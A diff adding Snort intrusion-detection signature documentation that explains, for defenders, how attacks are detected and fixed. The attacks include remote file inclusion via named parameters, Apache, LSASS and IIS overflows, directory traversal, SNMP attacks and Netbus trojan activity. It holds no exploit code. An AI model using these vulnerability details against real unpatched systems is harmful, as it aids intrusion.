+
+Ease of Attack: 
+Simple. This may be post-attack behavior and can be indicative of the
+successful exploitation of a vulnerable system.
+
+-- 
+
+False Positives: 
+This rule will generate an event if a legitimate system administrator
+executes the "id" command over an unencrypted connection to verify the
+privilege level available to him.
+
+This rule may also generate event by viewing the documentation on
+snort.org or any other security related web site which may contain
+details on this issue.
+
+The web site www.bugtraq.org serves a non-standard HTTP header of the
+form "X-Mandatory-Snort-Alert: *GOBBLE* uid=65534(nobody) uid=0(root)"
+browsing this site will generate an event.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional false positive information contributed by Arnd Fischer
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000331.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000331
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "ZixForum" application running on a webserver. Access to the file "settings.asp" using a remote file being passed as the "layid" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "layid" parameter in the "settings.asp" script used by the "ZixForum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ZixForum
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/122-13.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-13
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically an ips
+filtered protocol scan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2580.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2580
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a heap overflow
+associated with Apache 1.3 proxy and cache module.
+
+--
+Impact:
+A successful attack may cause a heap overflow, permitting the execution of
+arbitrary code.
+
+--
+Detailed Information:
+When Apache 1.3 is used and the host is configured to be a web proxy,
+reverse proxy and/or cache server, a vulnerability exists that may
+allow a heap overflow and the subsequent execution of arbitrary code
+on the vulnerable server.  This may occur when the server receives
+a malformed response from a malicious web server that includes a
+negative content length value.  This can cause invalid memory access
+and a denial of service or heap overflow.
+
+--
+Affected Systems:
+Apache 1.3.x
+
+--
+Attack Scenarios:
+An attacker can entice a user to visit a malicious web server.  If
+a vulnerable server proxies the request and receives a malformed
+response, a heap overflow may occur.
+
+--
+Ease of Attack:
+Simple. Exploit code is publicly available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+
+--
+Additional References
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0492
+
+Other:
+http://www.guninski.com/modproxy1.html
+
+--
--- /dev/null
+++ b/doc/signatures/2294.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2294
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1628.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1628
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1717.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1717
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2104.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2104
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability in the rexec daemon is unsucessful. This event is an indication that someone supplied an overly long username to the rexec daemon.
+
+--
+Impact:
+Serious.  An attacker may gain escalated privileges offering super user access on the affected host.
+
+--
+Detailed Information:
+Rexec offers users the ability to execute commands on a host from remote locations.
+
+A vulnerability exists such that an when an overly long username is supplied to the rexec daemon, a buffer overflow condition may occur thus presenting the attacker with the opportunity to execute arbitrary code and possibly gain escalated privileges on the target host.
+
+--
+Attack Scenarios:
+Simple.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disallow rexec commands from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2512.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2512
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1178.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1178
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1143.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1143
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000751.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000751
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Free QBoard" application running on a webserver. Access to the file "about.php" using a remote file being passed as the "qb_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "qb_path" parameter in the "about.php" script used by the "Free QBoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Free QBoard
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2543.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2543
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-CERT:
+http://www.us-cert.gov/cas/techalerts/TA04-104A.html
+
+--
--- /dev/null
+++ b/doc/signatures/999.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 999
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000316.txt
@@ -0,0 +1,71 @@
+Rule:  
+
+--
+Sid:
+100000315
+
+--
+Summary:
+This event is generated when an HTTP server issues a successful status
+code in response to a request to update a web document via the PUT method.
+
+--
+Impact:
+The PUT method is a legitimate HTTP command that allows an authorized user
+to upload a document into the web content tree. It is most often associated 
+with the WebDAV content management protocol.  
+
+Although there are some legitimate uses for the PUT method, it is also a
+frequent source of web site defacement, as attackers can easily abuse 
+misconfigured web servers that allow unrestricted PUT functionality from 
+arbitrary users.
+
+--
+Detailed Information:
+The rule searches for replies to HTTP PUT requests which indicate success.  
+When a successful reply is seen, it implies that the web content area has
+been modified, which may be an indicaton that the web site has been 
+defaced.
+
+This rule is intended to be used with another SID 100000315, which detects
+HTTP PUT requests.
+
+--
+Affected Systems:
+Any web server
+
+--
+Attack Scenarios:
+An attacker can issue a PUT reuqest via a script, many different pieces of 
+software, or through a manual connection to any web server port.
+
+--
+Ease of Attack:
+Simple.  Numerous tools exist for creating PUT requests, including some geared
+specifically towards web site defacement.  
+
+--
+False Positives:
+Organizations that use WebDAV to manage their web content may experience
+false positives, as the PUT method is a normal part of the WebDAV protocol.
+Additionally, any other legitimate web applications which use the PUT method
+will generate false positives.
+
+--
+False Negatives:
+None
+
+--
+Corrective Action:
+In cases of web site defacement, delete the newly-created file(s) and/or 
+restore them from a reliable backup. In all cases, be sure to tune web server
+configuration to allow PUT requests only where necessary for a legitimate web
+application to function.
+
+--
+Contributors:
+David J. Bianco, <david@vorant.com>
+
+-- 
+Additional References:
+http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html#sec9.6
--- /dev/null
+++ b/doc/signatures/1359.txt
@@ -0,0 +1,56 @@
+Rule: 
+
+--
+Sid: 1359
+
+-- 
+Summary: 
+A web command execution attack involving the use of a "ping" command
+
+-- 
+Impact: 
+Possible intelligence gathering activity. 
+
+-- 
+Detailed Information: 
+The attacker may have gained the ability to execute system commands remotely or the web server may be incorrectly configured to allow such access.
+
+This rule generates an event when a "ping" command is used over a plain-text (unencrypted) connection on one of the specified web ports to the target web server. The "ping" command may be used to perform information gathering activities.
+
+The rule looks for the "ping" command in the client to web server network traffic and does not indicate whether the command was actually successful. The presence of the "ping" command in the URI indicates that an attacker attempted to trick the web server into executing system in non-interactive mode i.e. without a valid shell session.
+
+Alternatively this rule may generate an event in an unencrypted HTTP tunneling connection to the server or a shell connection via another exploit against the web server.
+
+-- 
+Attack Scenarios: 
+An attacker uses a "ping" command to perform anonymous reconnaissance
+
+--
+Ease of Attack: 
+Simple. No exploit software required
+
+-- 
+False Positives: 
+none known
+
+--
+False Negatives: 
+none known
+
+-- 
+Corrective Action: 
+Check the web server software for vulnerabilities and possible upgrades or patches for the system to the latest version of the web software, also investigate the server logs for signs of compromise
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Disallowing execution of this binary via a URI is suggested.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2082.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2082
+
+--
+Summary:
+number for the rpc service xfsmd
+
+--
+Impact:
+Intelligence gathering
+
+--
+Detailed Information:
+This may be an attacker probing for vulnerable versions of rpc services.
+In this case, the rpc service xfsmd.
+
+It is possible for an attacker to supply a meta character followed by
+any commands or code of his choosing to the xfsmd daemon.
+
+Due to a programming error, the service does not correctly check for the
+characters and they are not stripped from the request.
+
+The xfsmd daemon is not installed by default on IRIX systems but it is 
+part of an optional package.
+
+--
+Affected Systems:
+	IRIX 6.2
+	IRIX 6.3
+	IRIX 6.4
+	IRIX 6.5.x
+
+--
+Attack Scenarios:
+Exploits are widely available.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Patches are NOT available for this issue.
+
+Disable and remove the xfsmd daemon.
+
+Uprade to the latest non affected version of the operating system
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5075
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0359
+
+SGI IRIX:
+ftp://patches.sgi.com/support/free/security/advisories/20020606-01-I
+
+--
--- /dev/null
+++ b/doc/signatures/1421.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1421
+
+--
+Summary:
+This event is generated when an attempt is made to attack a device using
+SNMP v1.
+
+--
+Impact:
+Varies depending on the implementation. Ranges from Denial of Service 
+(DoS) to code execution.
+
+--
+Detailed Information:
+SNMP is a widely adopted protocol for managing IP networks, including 
+individual network devices, and devices in aggregate. 
+
+Several network devices come pre-installed with this protocol for 
+management and monitoring.
+
+A number of vulnerabilities exist in SNMP v1, including a community 
+string buffer overflow, that will allow an attacker to execute arbitrary
+code or shutdown the service.
+
+--
+Affected Systems:
+Any implementation of the SNMP v1 protocol
+
+--
+Attack Scenarios:
+An attacker needs to send a specially crafted packet to UDP port 705
+of a vulnerable device, causing a Denial of Service or possible 
+execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the SNMP v1 protocol, use SNMP v2 protocol as an alternative.
+
+Disable the use of SNMP for devices that do not need it.
+
+Use Ingress/Egress filtering on a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+
+--
--- /dev/null
+++ b/doc/signatures/2399.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2399
+
+--
+Summary:
+This event is generated when an attempt is made to exploit the PHP web
+application WAnewsletter.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the WAnewsletter PHP web application running on a server.
+Multiple vulnerabilities exist in the application which can lead to the
+execution of arbitrary code of the atttackers choosing.
+
+--
+Affected Systems:
+	WAnewsletter
+
+--
+Attack Scenarios:
+An attacker can supply code of their choice by including a file in
+parameters supplied to the script newsletter.php or db_type.php.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1806.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1806
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow associated with chunked encoding processing of HTR in Internet Information Services (IIS). 
+
+--
+Impact:
+Remote Access.  If the exploit is successful, an attacker can gain remote access of the target host. 
+
+--
+Detailed Information:
+A buffer overflow exists with chunked encoding processing associated with HTR in IIS.  Chunked encoding allows different sized chunks of data to be passed from the web client to the server.  HTR is an older scripting language still supported by IIS. A heap overflow vulnerability exists because of an error in chunked encoding data transfer associated with the Internet Services Application Programming Interface (ISAPI) extension that implements HTR.
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0, 5.0 
+
+--
+Attack Scenarios:
+An attacker can craft a chunked encoded request to exploit the heap overflow.
+
+--
+Ease of Attack:
+Moderate.  Microsoft advises that this heap overflow is not as difficult to exploit as others.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+
+Apply the appropriate patch:
+
+  Microsoft IIS 4.0:
+     http://www.microsoft.com/Downloads/Release.asp?ReleaseID=39579
+  Microsoft IIS 5.0:
+     http://www.microsoft.com/Downloads/Release.asp?ReleaseID=39217 
+
+Investigate running the IIS Lockdown Tool to disable HTR functionality.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0364
+
+Bugtraq
+http://www.securityfocus.com/bid/4855
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms02-028.asp
+
+--
--- /dev/null
+++ b/doc/signatures/109.txt
@@ -0,0 +1,103 @@
+Rule:
+
+--
+Sid:
+109
+
+--
+Summary:
+Netbus is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine. This Trojan also has the ability to scan machines and networks for open ports, it can also redirect legitimate traffic to other destinations. It can turn the infected host into an open proxy server.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+The Trojan changes system registry settings to add the Netbus sever to programs normally started on boot. Due to the nature of this Trojan it is unlikely that the attacker's client IP address has been spoofed.
+
+	SID	Message
+	---	-------
+	109	netbus active (outgoing TCP connection)
+	110	netbus getinfo (incoming TCP connection)
+	115	netbus active (outgoing TCP connection)
+
+Server ports usually opened may be one of the following depending on the version of netbus: 12345, 12346, 20034
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
